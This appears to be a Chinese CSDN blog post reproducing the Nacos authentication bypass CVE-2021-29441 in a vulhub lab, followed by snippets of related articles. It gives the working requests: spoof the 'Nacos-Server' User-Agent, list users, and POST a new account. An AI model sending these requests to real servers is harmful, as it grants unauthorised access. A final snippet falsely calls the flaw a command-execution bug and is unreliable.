Nacos 未授权访问(CVE-2021-29441)

最新推荐文章于 2024-10-13 21:07:39 发布
最新推荐文章于 2024-10-13 21:07:39 发布
阅读量1.1k 收藏
点赞数 1
分类专栏: 中间件&框架漏洞复现 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/132580053
版权

Nacos 未授权访问(CVE-2021-29441)

Nacos是阿里巴巴推出的一个新的开源项目。它是一个动态的服务发现、配置管理和服务管理平台,可以更轻松地构建云原生应用程序。致力于帮助发现、配置和管理微服务。Nacos 提供了一套简单易用的功能集,可以快速实现动态服务发现、服务配置、服务元数据和流量管理。
当 nacos 在执行身份验证和授权操作时确定请求的用户代理是否为“Nacos-Server”时,就会发生该漏洞,如果是,则不会执行任何身份验证。开发人员的初衷是处理一些服务器到服务器的请求。但是,由于配置过于简单,并且协商的用户代理设置为Nacos-Server,因此直接在代码中硬编码,从而导致出现漏洞。通过利用此未经授权的漏洞,攻击者可以获取用户名和密码等敏感信息
环境:vulhub

1.判断是否有此漏洞(可以查看用户列表)
修改user-agent为Nacos-Server
访问http://192.168.85.128:8848/nacos/v1/auth/users?pageNo=1&pageSize=9
查看状态码是否为200以及返回的内容是否含有
在这里插入图片描述
在这里插入图片描述
2.添加用户
修改user-agent为Nacos-Server
采用post方式访问
http://192.168.85.128:8848/nacos/v1/auth/users?username=vulhub&password=vulhub
3.使用添加的账号登陆
在这里插入图片描述

mushangqiujin
关注
专栏目录
Ruoyi-Cloud-Plus_Nacos配置服务漏洞CVE-2021-29441_官方解决方法以及_修改源码解决---SpringCloud工作笔记199
添柴程序猿的专栏
02-02 700
Nacos是Alibaba的一个动态服务发现、配置和服务管理平台。修改方法是:在Nacos项目的application.properties文件中,添加一下的配置。这个时候:再去其他服务中修改配置文件,主要是nacos的注册部分,除了添加注册地址,还有,加上。配置以后再启动,然后再去,访问之前的api就会显示403,没问题了.这个时候,启动其他服务以后,就会出现注册不到nacos的情况。拦截一下地址,当访问地址是这个地址的时候,直接,拦截器中返回。上面的情况.会通过这个接口就可以添加用户了。
nacos授权添加用户漏洞(CVE-2021-29441
千寻的博客
11-04 1489
但是由于配置的过于简单,并且将协商好的`user-agent设置为Nacos-Server`,直接硬编码在了代码里,导致了漏洞的出现。 * 并且利用这个授权漏洞,攻击者可以`获取到用户名密码`等`敏感信息`。
Nacos认证绕过漏洞(CVE-2021-29441
tpaer的博客
12-16 2074
复现Nacos认证绕过漏洞,导致授权的任意访问
【渗透实战】Nacos授权访问CVE-2021-29441
Nafia的博客
02-20 4672
Nacos授权访问漏洞挖掘记录
Nacos漏洞总结复现_nacos默认jwt密钥导致授权访问
VN520的博客
10-10 1241
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户。
Nacos授权访问漏洞(CVE-2021-29441
Bird&Bird
03-11 1万+
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-S
Nacos漏洞修复】Nacos授权访问漏洞(CVE-2021-29441)
m0_52985087的博客
03-20 9771
但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/auth/users?命令:curl -X GET 'http://localhost:8848/nacos/v1/console/server/state'
JDK安装2023最完整教程与配置(零基础)
bdfcfff77fa的博客
06-19 1452
JDK安装2023最完整教程与配置(零基础)
vulhub靶场-[CVE-2021-29441]Alibaba Nacos权限认证绕过漏洞
ccccai22的博客
06-28 663
vulhub靶场-[CVE-2021-29441]Alibaba Nacos权限认证绕过漏洞
NACOS漏洞问题及修复(CVE-2021-29441)
热门推荐
Hoopy_Hoopy的博客
09-14 1万+
目录 1.漏洞相关问题 2.场景复现 2.1访问用户列表界面 2.2添加新用户 2.3再次查看用户列表 3.nacos升级 4.代码升级 1.漏洞相关问题 漏洞相关地址 CVE-2021-29441 - Nacos is a platform designed for dynamic service discovery and configuration and service management. - CVE-Searchhttps://cve.circl.lu/cve/CVE-20
Nacos 认证绕过漏洞(CVE-2021-29441
gaomei2009的专栏
06-20 691
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。
Alibaba Nacos 授权访问漏洞(CVE-2021-29441)
YHXSunny123456789的博客
05-29 408
一年一度HW又要开始了,大家是否遇到这漏洞,漏洞整改是要求升级nacos到1.4.1或者更高。一看nacos版本是满足这个要求的还是被扫除这个漏洞,在排查一圈后是nacos鉴权开启也是会扫出这个漏洞。下面就是开启鉴权整改了。
[CVE-2021-29441]Nacos授权访问漏洞,漏洞复现
最新发布
wxtnb4的博客
10-13 824
Nacos 致力于帮助开发者发现、配置和管理微服务,提供了全面的微服务解决方案,包括服务的动态注册与发现、服务的元数据管理、动态配置服务、动态 DNS 服务、服务和元数据管理。在请求数据的过程中,服务器会去识别user-agent ,当user-agent为Nacos-Server时,则不需要进行认证,而且是直接将这种验证方式硬编码在代码中,从而导致此漏洞的产生。前面说过,如果访问时,将useragent改为Nacos-Server,就不会需要认证,在这种情况下,我们先尝试访问
Nacos授权访问
zkaqlaoniao的博客
12-08 2030
该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。通过版本漏洞,攻击者可以在不登陆系统的情况下读取已存在的用户或者添加用户,进而登陆系统,登陆系统后可获取大量配置信息以发起进一步攻击。
nacos授权-CVE-2021-29441复现
crowsec
07-21 7962
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...
Nacos授权访问复现及修复
大数据姐姐
01-22 4198
Nacos授权访问修复,开启鉴权
修复nacos漏洞问题SQL注入CNVD-2020-67618、授权访问CVE-2021-29441
kaopuzong的博客
02-06 3021
修复nacos漏洞问题:漏洞1:SQL注入CNVD-2020-67618 漏洞2:授权访问CVE-2021-29441 漏洞3:token.secret.key默认配置QVD-2023-6271 漏洞4:Jraft Hessian反序列化CNVD-2023-45001
Nacos授权访问漏洞(CVE-2021-29441)复现】
一纸荒芜的博客
10-26 3124
Nacos授权访问漏洞复现
Nacos授权访问漏洞
00勇士王子的博客
02-27 6487
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
nacos漏洞的CVE-2021-29441如何解决
07-24
**Nacos 漏洞 CVE-2021-29441 解决方案** 在探讨 NacosCVE-2021-29441 总览 Nacos 是一款开源的服务发现、配置中心和微服务治理平台。CVE-2021-29441 是关于 Nacos 中存在的一个远程代码执行(RCE)漏洞。攻击者利用此漏洞可以发送恶意请求至 Nacos Server 端点,通过构造特定的 HTTP 请求头来执行任意命令,从而可能导致服务器崩溃或被控制。 ### 漏洞原因分析 这个漏洞主要是由于 Nacos 对某些 HTTP 请求头处理不当,能充分过滤或验证输入的敏感字符序列,导致恶意用户能够注入并执行恶意命令。 ### 解决方案 为了修复这一安全风险,Nacos 开发团队发布了补丁,并建议所有用户采取以下几个步骤: 1. **升级到最新版本**:最直接有效的办法是将 Nacos 更新到最新的稳定版,这通常包含对已知安全漏洞的修复。访问官方发布页面查找最新版本并按照文档指引进行更新。 - [Nacos 官方 GitHub 页面](https://github.com/alibaba/nacos/releases) 2. **禁用不受支持的功能**:如果您的部署暂时无法升级,可以尝试关闭或禁用那些可能导致攻击的特定功能。Nacos 提供了详细的管理界面选项来控制其操作模式和端口暴露,注意避免开启不必要的对外接口和服务。 3. **实施网络隔离与防火墙策略**:即便使用了最新版本的 Nacos,也应确保内部网络环境的安全,包括但不限于限制外部网络对 Nacos 服务的访问权限,设置合理的防火墙规则以阻止非授权的通信。 4. **定期审核安全配置**:持续监控 Nacos 配置文件和日志记录,检查是否有异常活动,以及是否有人尝试利用此漏洞进行攻击。同时,考虑采用审计工具和入侵检测系统 (IDS) 来加强安全性。 5. **开展安全培训**:提升团队成员对于最新威胁的意识,强化安全最佳实践,如避免硬编码敏感信息、正确处理用户输入等,降低人为错误引入安全隐患的可能性。 ### 结论 修复 Nacos 中的 CVE-2021-29441 漏洞不仅涉及到软件版本的更新,还需要全面的安全风险管理措施。及时响应安全公告,结合实际业务场景制定综合防护策略,是保护系统免受此类攻击的关键所在。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值